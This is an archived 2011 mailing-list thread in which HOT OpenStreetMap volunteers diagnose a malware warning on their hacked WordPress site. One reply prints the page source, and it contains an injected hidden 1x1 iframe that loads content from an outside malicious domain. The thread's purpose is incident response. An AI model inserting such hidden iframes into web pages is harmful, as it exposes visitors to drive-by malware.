[HOT] Malware on hot.openstreetmap.org

Rodolphe Quiedeville rodolphe at quiedeville.org
Mon Oct 24 07:36:00 BST 2011


Le 24/10/2011 08:28, Kate Chapman a écrit :
> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
> missing something.

The iframe is not on the /weblog/ pages you can see it when you call the
root url like this :


rodo at elz:~$ curl hot.openstreetmap.org
<html>
<head>
<META HTTP-EQUIV="refresh" content="0;URL=/weblog">
</head>
<body><iframe
src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
width="1" height="1"></iframe>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ?
"https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost +
"google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-5963453-1");
pageTracker._trackPageview();
</script>
</body>
</html>

Have a look at the beginning of body part

It's probably not in the theme part of Wordpress, but somewhere in the
config parts of the blog.

Regards



> 
> -Kate
> 
> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
> <rodolphe at quiedeville.org> wrote:
>> Hi,
>>
>> Someone cracked the Wordpress installed on hot.openstreetmap.org and add
>> an iframe to :
>>
>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
>>
>> Edit the wordpresss template, remove this iframe and it could resolve
>> the problem. The security alert occurs on Firefox too.
>>
>> Regards
>>
>>
>> Le 23/10/2011 23:33, Kate Chapman a écrit :
>>> Hi Floris,
>>>
>>> Yes, I know about the problem but haven't been able to fix it.  I think
>>> logging into the server might be necessary, but I think only Mikel has
>>> access.
>>>
>>> If anyone has other suggestions please help.
>>>
>>> Kate
>>>
>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu
>>> <mailto:osm at floris.nu>> wrote:
>>>
>>>     I'm getting warnings from Chrome at the moment that
>>>     hot.openstreetmap.org <http://hot.openstreetmap.org> is infected
>>>     with malware.
>>>
>>>     Anybody want to look into that?
>>>
>>>     Here's the google diagnose page for it:
>>>
>>>     http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
>>>     <http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en>
>>>
>>>     Greetings,
>>>     Floris Looijesteijn
>>>
>>>     (tracing Van, Turkey)
>>>
>>>     _______________________________________________
>>>     HOT mailing list
>>>     HOT at openstreetmap.org <mailto:HOT at openstreetmap.org>
>>>     http://lists.openstreetmap.org/listinfo/hot
>>>
>>>
>>>
>>> _______________________________________________
>>> HOT mailing list
>>> HOT at openstreetmap.org
>>> http://lists.openstreetmap.org/listinfo/hot
>>
>>
>> --
>> Rodolphe Quiédeville
>> http://cartosm.eu - Intégration de carte libre sur site web
>> Blog : http://blog.rodolphe.quiedeville.org/
>> SIP/XMPP : rodolphe at quiedeville.org
>>
>> _______________________________________________
>> HOT mailing list
>> HOT at openstreetmap.org
>> http://lists.openstreetmap.org/listinfo/hot
>>


-- 
Rodolphe Quiédeville
http://cartosm.eu - Intégration de carte libre sur site web
Blog : http://blog.rodolphe.quiedeville.org/
SIP/XMPP : rodolphe at quiedeville.org



More information about the HOT mailing list